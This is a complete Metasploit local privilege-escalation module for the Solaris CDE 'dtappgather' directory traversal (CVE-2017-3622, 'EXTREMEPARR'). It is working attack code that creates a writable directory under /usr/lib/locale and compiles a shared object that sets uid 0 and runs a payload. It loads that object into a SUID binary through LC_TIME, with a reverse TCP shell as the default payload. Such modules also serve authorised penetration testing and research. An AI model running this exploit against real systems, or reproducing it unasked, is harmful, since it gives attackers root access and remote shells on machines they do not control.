Solaris EXTREMEPARR dtappgather Privilege Escalation

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = ExcellentRanking  
  
include Msf::Post::File  
include Msf::Post::Solaris::Priv  
include Msf::Post::Solaris::System  
include Msf::Post::Solaris::Kernel  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",  
'Description' => %q{  
This module exploits a directory traversal vulnerability in the  
`dtappgather` executable included with Common Desktop Environment (CDE)  
on unpatched Solaris systems prior to Solaris 10u11 which allows users  
to gain root privileges.  
  
dtappgather allows users to create a user-owned directory at any  
location on the filesystem using the `DTUSERSESSION` environment  
variable.  
  
This module creates a directory in `/usr/lib/locale`, writes a shared  
object to the directory, and runs the specified SUID binary with the  
shared object loaded using the `LC_TIME` environment variable.  
  
This module has been tested successfully on:  
  
Solaris 9u7 (09/04) (x86);  
Solaris 10u1 (01/06) (x86);  
Solaris 10u2 (06/06) (x86);  
Solaris 10u4 (08/07) (x86);  
Solaris 10u8 (10/09) (x86);  
Solaris 10u9 (09/10) (x86).  
},  
'References' =>  
[  
['BID', '97774'],  
['CVE', '2017-3622'],  
['EDB', '41871'],  
['URL', 'https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh'],  
['URL', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html']  
],  
'Notes' => { 'AKA' => ['EXTREMEPARR'] },  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Shadow Brokers', # exploit  
'Hacker Fantastic', # dtappgather-poc.sh  
'Brendan Coles' # Metasploit  
],  
'DisclosureDate' => 'Apr 24 2017',  
'Privileged' => true,  
'Platform' => ['solaris', 'unix'],  
'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],  
'Targets' => [['Auto', {}]],  
'SessionTypes' => ['shell', 'meterpreter'],  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',  
'WfsDelay' => 10,  
'PrependFork' => true  
},  
'DefaultTarget' => 0))  
register_options [  
# Some useful example SUID executables:  
# * /usr/bin/at  
# * /usr/bin/cancel  
# * /usr/bin/chkey  
# * /usr/bin/lp  
# * /usr/bin/lpset  
# * /usr/bin/lpstat  
# * /usr/lib/lp/bin/netpr  
# * /usr/sbin/lpmove  
OptString.new('SUID_PATH', [true, 'Path to suid executable', '/usr/bin/at']),  
OptString.new('DTAPPGATHER_PATH', [true, 'Path to dtappgather executable', '/usr/dt/bin/dtappgather'])  
]  
register_advanced_options [  
OptBool.new('ForceExploit', [false, 'Override check result', false]),  
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])  
]  
end  
  
def suid_bin_path  
datastore['SUID_PATH']  
end  
  
def dtappgather_path  
datastore['DTAPPGATHER_PATH']  
end  
  
def mkdir(path)  
vprint_status "Creating directory '#{path}'"  
cmd_exec "mkdir -p '#{path}'"  
register_dir_for_cleanup path  
end  
  
def upload(path, data)  
print_status "Writing '#{path}' (#{data.size} bytes) ..."  
rm_f path  
write_file path, data  
register_file_for_cleanup path  
end  
  
def upload_and_compile(path, data)  
upload "#{path}.c", data  
  
output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -fPIC -shared -g -lc -o #{path} #{path}.c"  
unless output.blank?  
print_error output  
fail_with Failure::Unknown, "#{path}.c failed to compile"  
end  
  
register_file_for_cleanup path  
end  
  
def symlink(link_target, link_name)  
vprint_status "Symlinking #{link_target} to #{link_name}"  
rm_f link_name  
cmd_exec "ln -sf #{link_target} #{link_name}"  
register_file_for_cleanup link_name  
end  
  
def check  
[dtappgather_path, suid_bin_path].each do |path|  
unless setuid? path  
vprint_error "#{path} is not setuid"  
return CheckCode::Safe  
end  
vprint_good "#{path} is setuid"  
end  
  
unless has_gcc?  
vprint_error 'gcc is not installed'  
return CheckCode::Safe  
end  
vprint_good 'gcc is installed'  
  
version = kernel_release  
if version.to_s.eql? ''  
vprint_error 'Could not determine Solaris version'  
return CheckCode::Detected  
end  
  
unless Gem::Version.new(version).between? Gem::Version.new('5.7'), Gem::Version.new('5.10')  
vprint_error "Solaris version #{version} is not vulnerable"  
return CheckCode::Safe  
end  
vprint_good "Solaris version #{version} appears to be vulnerable"  
  
CheckCode::Appears  
end  
  
def exploit  
if is_root?  
fail_with Failure::BadConfig, 'Session already has root privileges'  
end  
  
unless [CheckCode::Detected, CheckCode::Appears].include? check  
unless datastore['ForceExploit']  
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'  
end  
print_warning 'Target does not appear to be vulnerable'  
end  
  
unless writable? datastore['WritableDir']  
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"  
end  
  
# Remove appmanager directory and contents  
appmanager_path = '/var/dt/appconfig/appmanager'  
vprint_status "Cleaning appmanager directory #{appmanager_path}"  
cmd_exec "chmod -R 755 #{appmanager_path}/*"  
cmd_exec "rm -rf #{appmanager_path}/*"  
rm_f appmanager_path  
  
# Create writable directory in /usr/lib/locale  
locale_path = '/usr/lib/locale'  
locale_name = rand_text_alphanumeric 5..10  
new_dir = "#{locale_path}/#{locale_name}"  
vprint_status "Creating directory #{new_dir}"  
depth = 3  
cmd_exec "DTUSERSESSION=. /usr/dt/bin/dtappgather"  
depth.times do  
cmd_exec "DTUSERSESSION=.. /usr/dt/bin/dtappgather"  
end  
symlink locale_path, appmanager_path  
cmd_exec "DTUSERSESSION=#{locale_name} #{dtappgather_path}"  
unless cmd_exec("ls -al #{locale_path} | grep #{locale_name}").to_s.include? locale_name  
fail_with Failure::NotVulnerable, "Could not create directory #{new_dir}"  
end  
  
print_good "Created directory #{new_dir}"  
register_dir_for_cleanup new_dir  
  
rm_f appmanager_path  
cmd_exec "chmod 755 #{new_dir}"  
  
# Upload and compile shared object  
base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"  
mkdir base_path  
  
payload_name = ".#{rand_text_alphanumeric 5..10}"  
payload_path = "#{base_path}/#{payload_name}"  
  
so = <<-EOF  
void __attribute__((constructor)) cons() {  
setuid(0);  
setgid(0);  
execle("#{payload_path}", "", 0, 0);  
_exit(0);  
}  
EOF  
  
so_name = ".#{rand_text_alphanumeric 5..10}"  
so_path = "#{base_path}/#{so_name}"  
upload_and_compile so_path, so  
  
vprint_status "Writing shared objects to #{new_dir}"  
cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.2'"  
register_file_for_cleanup "#{new_dir}/#{locale_name}.so.2"  
cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.3'"  
register_file_for_cleanup "#{new_dir}/#{locale_name}.so.3"  
  
# Upload and execute payload  
upload payload_path, generate_payload_exe  
cmd_exec "chmod +x #{payload_path}"  
  
print_status 'Executing payload...'  
cmd_exec "LC_TIME=#{locale_name} #{suid_bin_path} & echo "  
end  
end  
`